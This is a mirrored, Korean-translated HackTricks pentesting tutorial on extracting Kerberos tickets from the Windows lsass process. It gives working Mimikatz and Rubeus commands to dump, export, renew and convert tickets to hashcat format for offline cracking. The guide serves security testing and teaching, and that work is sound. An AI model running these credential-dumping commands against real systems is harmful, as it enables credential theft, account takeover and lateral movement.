Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-30 08:30:57 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-kerberos-88/harvesting-tickets-from-windows.md
Translator workflow 1d9d380da0 Translated to Korean
2024-02-10 21:30:13 +00:00

62 lines
4.1 KiB
Markdown
Raw Blame History

# 윈도우에서 티켓 수집하기
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **HackTricks**와 **HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>
Windows에서 티켓은 보안 정책을 처리하는 **lsass** (Local Security Authority Subsystem Service) 프로세스에 의해 관리되고 저장됩니다. 이러한 티켓을 추출하기 위해서는 lsass 프로세스와 상호 작용해야 합니다. 비 관리자 사용자는 자신의 티켓에만 액세스할 수 있지만 관리자는 시스템의 모든 티켓을 추출할 권한이 있습니다. 이러한 작업을 위해 **Mimikatz**와 **Rubeus**라는 도구가 널리 사용되며, 각각 다른 명령과 기능을 제공합니다.
### Mimikatz
Mimikatz는 Windows 보안과 상호 작용할 수 있는 다재다능한 도구입니다. 티켓을 추출하는 것뿐만 아니라 다양한 보안 관련 작업에 사용됩니다.
```bash
# Extracting tickets using Mimikatz
sekurlsa::tickets /export
```
### Rubeus
Rubeus는 Kerberos 상호작용과 조작을 위해 특별히 개발된 도구입니다. 티켓 추출 및 처리뿐만 아니라 다른 Kerberos 관련 작업에 사용됩니다.
```bash
# Dumping all tickets using Rubeus
.\Rubeus dump
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Listing all tickets
.\Rubeus.exe triage
# Dumping a specific ticket by LUID
.\Rubeus.exe dump /service:krbtgt /luid:<luid> /nowrap
[IO.File]::WriteAllBytes("ticket.kirbi", [Convert]::FromBase64String("<BASE64_TICKET>"))
# Renewing a ticket
.\Rubeus.exe renew /ticket:<BASE64_TICKET>
# Converting a ticket to hashcat format for offline cracking
.\Rubeus.exe hash /ticket:<BASE64_TICKET>
```
이러한 명령을 사용할 때, `<BASE64_TICKET>``<luid>`와 같은 자리 표시자를 실제로 Base64로 인코딩된 티켓과 로그온 ID로 대체해야 합니다. 이 도구들은 티켓을 관리하고 Windows의 보안 메커니즘과 상호 작용하는 데 광범위한 기능을 제공합니다.
## 참고 자료
* [https://www.tarlogic.com/en/blog/how-to-attack-kerberos/](https://www.tarlogic.com/en/blog/how-to-attack-kerberos/)
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 AWS 해킹을 처음부터 전문가까지 배워보세요<strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스웨그**](https://peass.creator-spring.com)를 얻으세요.
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요. 독점적인 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션입니다.
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **참여**하거나 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **HackTricks**와 **HackTricks Cloud** github 저장소에 PR을 제출하여 여러분의 해킹 기교를 공유하세요.
</details>
Reference in a new issue View git blame Copy permalink